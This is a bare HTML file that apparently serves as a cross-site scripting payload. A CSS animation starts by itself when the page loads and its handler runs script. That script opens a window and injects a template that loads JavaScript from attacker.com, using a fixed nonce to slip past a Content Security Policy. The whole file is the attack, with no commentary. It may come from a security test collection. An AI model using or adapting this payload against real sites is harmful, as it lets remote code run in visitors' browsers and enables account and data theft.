<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<style>@keyframes GGGGGYVPfQGGGGG{}</style>
<xss style=animation-name:GGGGGYVPfQGGGGG onanimationstart="w=window.open('self.js'); w.document.write('<template id=GGGYVPfQGGG><script src=https://attacker.com/static/static.js nonce=123><\/script><\/template><script nonce=123>document.body.appendChild(GGGYVPfQGGG.content.cloneNode(true));<\/script>');"></xss>
</body>
</html>
